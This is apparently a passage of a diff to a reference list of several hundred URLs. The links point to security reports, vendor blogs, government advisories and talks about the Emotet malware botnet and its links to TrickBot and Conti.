"https://www.bleepingcomputer.com/news/security/emotet-malware-attacks-return-after-three-month-break/", - "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", - "https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/", - 
"https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation", - "https://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one", - "https://cyber.wtf/2022/03/23/what-the-packer/", - "https://blogs.jpcert.or.jp/en/2019/12/emotetfaq.html", - "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_workshop_malware-analysis_jp.pdf", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", - "https://www.blueliv.com/blog/research/where-is-emotet-latest-geolocation-data/", - "https://www.dsih.fr/article/4483/emotet-de-retour-poc-exchange-0-day-windows-a-quelle-sauce-les-attaquants-prevoient-de-nous-manger-cette-semaine.html", - "https://cdn.www.carbonblack.com/wp-content/uploads/2020/05/VMWCB-Report-Modern-Bank-Heists-2020.pdf", - "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html", - "https://www.lac.co.jp/lacwatch/alert/20211119_002801.html", - "https://www.advintel.io/post/corporate-loader-emotet-history-of-x-project-return-for-ransomware", - "https://www.bitsight.com/blog/emotet-smb-spreader-back", - "https://www.zscaler.com/blogs/security-research/return-emotet-malware", - "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", - "https://forensicitguy.github.io/shortcut-to-emotet-ttp-change/", - "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", - "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html", - "https://twitter.com/ContiLeaks/status/1498614197202079745", - "https://www.atomicmatryoshka.com/post/malware-headliners-emotet", - "https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/", - "https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled", - 
"https://d00rt.github.io/emotet_network_protocol/", - "https://www.binarydefense.com/emotet-wi-fi-spreader-upgraded/", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", - "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", - "https://kienmanowar.wordpress.com/2022/01/23/quicknote-emotet-epoch4-epoch5-tactics/", - "https://www.proofpoint.com/us/blog/threat-insight/emotet-tests-new-delivery-techniques", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", - "https://www.cert.pl/en/news/single/whats-up-emotet/", - "https://www.fortinet.com/blog/threat-research/deep-dive-into-emotet-malware.html", - "https://www.kroll.com/en/insights/publications/cyber/monitor/emotet-analysis-new-lnk-in-the-infection-chain", - "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return", - "https://www.youtube.com/watch?v=_mGMJFNJWSk", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html", - "https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://securelist.com/financial-cyberthreats-in-2020/101638/", - "https://team-cymru.com/blog/2021/01/27/taking-down-emotet/", - "https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/", - "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmwcb-report-modern-bank-heists-2020.pdf", - "https://www.hornetsecurity.com/en/threat-research/emotet-botnet-takedown/", - "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/", - 
"https://isc.sans.edu/diary/28044", - "https://community.riskiq.com/article/2cd1c003", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://blog.trendmicro.com/trendlabs-security-intelligence/emotet-adds-new-evasion-technique-and-uses-connected-devices-as-proxy-cc-servers/", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", - "https://blog.cyble.com/2022/04/27/emotet-returns-with-new-ttps-and-delivers-lnk-files-to-its-victims/", - "https://www.bleepingcomputer.com/news/security/emotet-malware-is-back-and-rebuilding-its-botnet-via-trickbot/", - "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", - "https://www.trendmicro.com/en_no/research/23/c/emotet-returns-now-adopts-binary-padding-for-evasion.html", - "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", - "https://security-soup.net/quick-post-spooky-new-powershell-obfuscation-in-emotet-maldocs/", - "https://forensicitguy.github.io/emotet-excel4-macro-analysis/", "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html", - "https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/", - "https://threatresearch.ext.hp.com/emotets-return-whats-different/", - "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", - "https://isc.sans.edu/forums/diary/Emotet+Stops+Using+0000+in+Spambot+Traffic/28270/", - "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", - "https://www.jpcert.or.jp/english/at/2019/at190044.html", - "https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/", - 
"https://www.netresec.com/?page=Blog&month=2022-05&post=Emotet-C2-and-Spam-Traffic-Video", - "https://blog.lumen.com/emotet-redux/", - "https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/", - "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/", - "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://adalogics.com/blog/the-state-of-advanced-code-injections", "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", - "https://www.intrinsec.com/emotet-returns-and-deploys-loaders/", - "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", - "https://www.youtube.com/watch?v=EyDiIAt__dI", - "https://muha2xmad.github.io/unpacking/emotet-part-2/", - "https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/", - "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", - "https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/", - "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", - "https://isc.sans.edu/diary/rss/27036", - "http://ropgadget.com/posts/defensive_pcres.html", - "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", - "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/", - "https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/", - 
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.trendmicro.com/en_us/research/22/a/emotet-spam-abuses-unconventional-ip-address-formats-spread-malware.html", - "https://kienmanowar.wordpress.com/2022/12/19/z2abimonthly-malware-challege-emotet-back-from-the-dead/", - "https://www.youtube.com/watch?v=_BLOmClsSpc", - "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles", - "https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/", - "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/", - "https://blogs.vmware.com/security/2022/03/emotet-c2-configuration-extraction-and-analysis.html", - "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html", - "https://www.netskope.com/blog/emotet-new-delivery-mechanism-to-bypass-vba-protection", - "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/", - "https://cert-agid.gov.it/news/malware/semplificare-lanalisi-di-emotet-con-python-e-iced-x86/", + "https://www.jpcert.or.jp/english/at/2019/at190044.html", + "https://www.proofpoint.com/us/blog/threat-insight/geofenced-amazon-japan-credential-phishing-volumes-rival-emotet", + "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage", + "https://cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/", + "https://marcoramilli.com/2019/10/14/is-emotet-gang-targeting-companies-with-external-soc/", + "https://www.youtube.com/watch?v=5_-oR_135ss", + "https://www.zscaler.com/blogs/research/emotet-back-action-after-short-break", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", "https://unit42.paloaltonetworks.com/emotet-malware-summary-epoch-4-5/", - 
"https://blogs.vmware.com/networkvirtualization/2022/02/emotet-is-not-dead-yet-part-2.html/", - "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/", - "https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5", - "https://www.fortinet.com/blog/threat-research/Trends-in-the-recent-emotet-maldoc-outbreak", - "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/", + "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", + "https://www.cert.govt.nz/it-specialists/advisories/emotet-malware-being-spread-via-email/", + "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/", + "https://muha2xmad.github.io/unpacking/emotet-part-2/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns", - "https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/", - "https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/", - "https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69", - "https://www.cyren.com/blog/articles/example-analysis-of-multi-component-malware", + "https://blogs.cisco.com/security/emotet-is-back", + "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://security-soup.net/quick-post-spooky-new-powershell-obfuscation-in-emotet-maldocs/", + "https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/", + "https://blogs.vmware.com/security/2022/03/emotet-c2-configuration-extraction-and-analysis.html", + "https://www.bitsight.com/blog/emotet-smb-spreader-back", + "https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/", + 
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", + "https://hatching.io/blog/powershell-analysis", + "https://www.hornetsecurity.com/en/threat-research/emotet-botnet-takedown/", + "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/", + "https://www.hornetsecurity.com/en/security-information/emotet-is-back/", + "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise", + "https://www.proofpoint.com/us/blog/threat-insight/emotet-makes-timely-adoption-political-and-elections-lures", + "https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/", + "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html", + "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles", + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol", + "https://www.eurojust.europa.eu/worlds-most-dangerous-malware-emotet-disrupted-through-global-action", + "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html", + "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", + "https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/", + "https://www.lac.co.jp/lacwatch/alert/20211119_002801.html", + "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", + "https://cyber.wtf/2021/11/15/guess-whos-back/", + 
"https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903", + "https://speakerdeck.com/fr0gger/x-ray-of-malware-evasion-techniques-analysis-dissection-cure", + "https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/", + "https://blogs.jpcert.or.jp/en/2019/12/emotetfaq.html", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.zscaler.com/blogs/security-research/return-emotet-malware", + "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/", "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", - "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return", + "https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation", + "https://www.bleepingcomputer.com/news/security/united-nations-targeted-with-emotet-malware-phishing-attack/", + "https://asec.ahnlab.com/en/33600/", + "https://isc.sans.edu/diary/28044", + "https://www.ironnet.com/blog/detecting-a-mummyspider-campaign-and-emotet-infection", + "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://isc.sans.edu/diary/rss/28254", + "https://blogs.vmware.com/networkvirtualization/2022/01/emotet-is-not-dead-yet.html/", + "https://intel471.com/blog/emotet-takedown-2021/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "https://www.zscaler.com/blogs/security-research/return-emotet-malware-analysis", + "https://blogs.vmware.com/networkvirtualization/2022/02/emotet-is-not-dead-yet-part-2.html/", + "https://medium.com/brim-securitys-knowledge-funnel/hunting-emotet-with-brim-and-zeek-1000c2f5c1ff", 
+ "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/", + "https://www.hornetsecurity.com/en/threat-research/comeback-emotet/", + "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", + "https://www.welivesecurity.com/2023/07/06/whats-up-with-emotet/", + "https://blog.vincss.net/2021/01/re019-from-a-to-x-analyzing-some-real-cases-which-used-recent-Emotet-samples.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-your-email-attachments-to-attack-contacts/", + "https://threatpost.com/emotet-spreading-malicious-excel-files/178444/", + "https://unit42.paloaltonetworks.com/emotet-command-and-control/", + "https://www.inde.nz/blog/analysis-of-the-latest-wave-of-emotet-malicious-documents", + "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-one-592612", + "https://www.netskope.com/blog/emotet-still-abusing-microsoft-office-macros", + "https://www.secureworks.com/research/threat-profiles/gold-crestwood", + "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/", + "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", + "http://ropgadget.com/posts/defensive_pcres.html", + "https://www.deepinstinct.com/blog/the-re-emergence-of-emotet", + "https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", + "https://www.digitalshadows.com/blog-and-research/how-cybercriminals-are-taking-advantage-of-covid-19-scams-fraud-misinformation/", + 
"https://d00rt.github.io/emotet_network_protocol/", + "https://news.sophos.com/en-us/2020/07/28/emotets-return-is-the-canary-in-the-coal-mine/?cmp=30728", + "https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates", "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1", + "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf", + "https://www.deepinstinct.com/2020/08/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before/", + "https://www.tagesschau.de/investigativ/br-recherche/emotet-schadsoftware-103.html", + "https://github.com/d00rt/emotet_research", + "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", + "https://www.bitsight.com/blog/emotet-botnet-rises-again", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", + "https://www.dsih.fr/article/4483/emotet-de-retour-poc-exchange-0-day-windows-a-quelle-sauce-les-attaquants-prevoient-de-nous-manger-cette-semaine.html", + "https://www.esentire.com/security-advisories/emotet-activity-identified", + "https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion", + "https://paste.cryptolaemus.com", + "https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/", + "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/", + "https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment", + "https://www.wiwo.de/my/technologie/digitale-welt/emotet-netzwerk-wie-eines-der-groessten-hacker-netzwerke-der-welt-lahmgelegt-wurde/27164048.html", + "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html", + "https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/", + "https://www.cert.pl/en/news/single/whats-up-emotet/", + "https://www.youtube.com/watch?v=_mGMJFNJWSk", + 
"https://threatresearch.ext.hp.com/emotets-return-whats-different/",
+ "https://isc.sans.edu/forums/diary/Emotet+Stops+Using+0000+in+Spambot+Traffic/28270/",
+ "https://forensicitguy.github.io/shortcut-to-emotet-ttp-change/",
+ "https://www.fortinet.com/blog/threat-research/deep-dive-into-emotet-malware.html",
+ "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_workshop_malware-analysis_jp.pdf",
+ "https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers",
+ "https://unit42.paloaltonetworks.com/new-emotet-infection-method/",
+ "https://medium.com/threat-intel/emotet-dangerous-malware-keeps-on-evolving-ac84aadbb8de",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf",
+ "https://twitter.com/milkr3am/status/1354459859912192002",
+ "https://www.youtube.com/watch?v=8PHCZdpNKrw",
+ "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2020-ALE-019/",
+ "https://www.netresec.com/?page=Blog&month=2022-05&post=Emotet-C2-and-Spam-Traffic-Video",
+ "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure",
+ "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/",
+ "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/",
+ "https://unit42.paloaltonetworks.com/attack-chain-overview-emotet-in-december-2020-and-january-2021/",
+ "https://forensicitguy.github.io/emotet-excel4-macro-analysis/",
+ "https://github.com/mauronz/binja-emotet",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf",
+ "https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/",
+ "https://twitter.com/raashidbhatt/status/1237853549200936960",
+ "https://www.welivesecurity.com/2022/06/16/how-emotet-is-changing-tactics-microsoft-tightening-office-macro-security/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-003.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack",
+ "https://spamauditor.org/2020/10/the-many-faces-of-emotet/",
+ "https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled",
+ "https://www.vmware.com/content/dam/learn/en/amer/fy23/pdf/1669005_Emotet_Exposed_A_Look_Inside_the_Cybercriminal_Supply_Chain.pdf",
+ "https://www.fortinet.com/blog/threat-research/ms-office-files-involved-again-in-recent-emotet-trojan-campaign-part-ii",
+ "https://www.cronup.com/la-botnet-de-emotet-reinicia-ataques-en-chile-y-latinoamerica/",
+ "https://notes.netbytesec.com/2021/02/deobfuscating-emotet-macro-and.html",
+ "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/emotet-adds-new-evasion-technique-and-uses-connected-devices-as-proxy-cc-servers/",
+ "https://isc.sans.edu/diary/rss/27036",
+ "https://kienmanowar.wordpress.com/2022/12/19/z2abimonthly-malware-challege-emotet-back-from-the-dead/",
+ "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-emotets-use-of-cryptography/",
+ "https://www.bleepingcomputer.com/news/security/emotet-botnet-switches-to-64-bit-modules-increases-activity/",
+ "https://therecord.media/over-780000-email-accounts-compromised-by-emotet-have-been-secured/",
+ "https://kienmanowar.wordpress.com/2022/01/23/quicknote-emotet-epoch4-epoch5-tactics/",
+ "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/",
+ "https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html",
+ "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://www.youtube.com/watch?v=AkZ5TYBqcU4",
+ "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships",
+ "https://unit42.paloaltonetworks.com/domain-parking/",
+ "https://medium.com/@Ilandu/emotet-unpacking-35bbe2980cfb",
+ "https://blog.virustotal.com/2020/11/using-similarity-to-expand-context-and.html",
+ "https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/",
+ "https://blog.talosintelligence.com/2020/11/emotet-2020.html",
+ "https://www.netskope.com/blog/netskope-threat-coverage-the-return-of-emotet",
+ "https://hello.global.ntt/en-us/insights/blog/emotet-disruption-europol-counterattack",
+ "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html",
+ "https://www.kroll.com/en/insights/publications/cyber/monitor/emotet-analysis-new-lnk-in-the-infection-chain",
+ "https://www.gdatasoftware.com/blog/2022/01/malware-vaccines",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/",
+ "https://blog.lumen.com/emotet-redux/",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
+ "https://www.digitalshadows.com/blog-and-research/emotet-disruption/",
+ "https://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/",
+ "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
+ "https://cert-agid.gov.it/news/malware/semplificare-lanalisi-di-emotet-con-python-e-iced-x86/",
+ "https://www.atomicmatryoshka.com/post/malware-headliners-emotet",
+ "https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/",
+ "https://blog.nviso.eu/2022/03/23/hunting-emotet-campaigns-with-kusto/",
+ "https://www.us-cert.gov/ncas/alerts/TA18-201A",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://pl-v.github.io/plv/posts/Emotet-unpacking/",
+ "https://www.seqrite.com/blog/the-return-of-the-emotet-as-the-world-unlocks/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://blog.talosintelligence.com/emotet-switches-to-onenote/",
+ "https://unit42.paloaltonetworks.com/emotet-thread-hijacking/",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-two-596128",
+ "https://persianov.net/emotet-malware-analysis-part-1",
+ "https://www.infosecurity-magazine.com/blogs/a-rundown-of-the-emotet-malware/",
+ "https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/",
+ "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return",
+ "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
+ "https://de.darktrace.com/blog/emotet-resurgence-cross-industry-campaign-analysis",
+ "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot",
+ "https://muha2xmad.github.io/unpacking/emotet-part-1/",
+ "https://cofense.com/blog/emotet-sending-malicious-emails-after-three-month-hiatus/",
+ "https://www.picussecurity.com/blog/emotet-technical-analysis-part-1-reveal-the-evil-code",
+ "https://www.binarydefense.com/emotet-wi-fi-spreader-upgraded/",
+ "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
+ "https://www.youtube.com/watch?v=q8of74upT_g",
+ "https://blog.cyble.com/2022/04/27/emotet-returns-with-new-ttps-and-delivers-lnk-files-to-its-victims/",
+ "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx",
+ "https://www.bleepingcomputer.com/news/security/emotet-malware-attacks-return-after-three-month-break/",
+ "https://www.advintel.io/post/corporate-loader-emotet-history-of-x-project-return-for-ransomware",
+ "https://quickheal.co.in/documents/technical-paper/Whitepaper_HowToPM.pdf",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://www.youtube.com/watch?v=EyDiIAt__dI",
+ "https://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html",
 "https://www.hornetsecurity.com/en/security-information/awaiting-the-inevitable-return-of-emotet/",
+ "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf",
+ "https://cdn.www.carbonblack.com/wp-content/uploads/2020/05/VMWCB-Report-Modern-Bank-Heists-2020.pdf",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
+ "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/",
+ "https://blogs.vmware.com/security/2022/08/how-to-replicate-emotet-lateral-movement.html",
+ "https://persianov.net/emotet-malware-analysis-part-2",
+ "https://intezer.com/blog/research/how-hackers-use-binary-padding-to-outsmart-sandboxes/",
+ "https://www.fortinet.com/blog/threat-research/bad-actors-capitalize-current-events-email-scams",
+ "https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/",
+ "https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/",
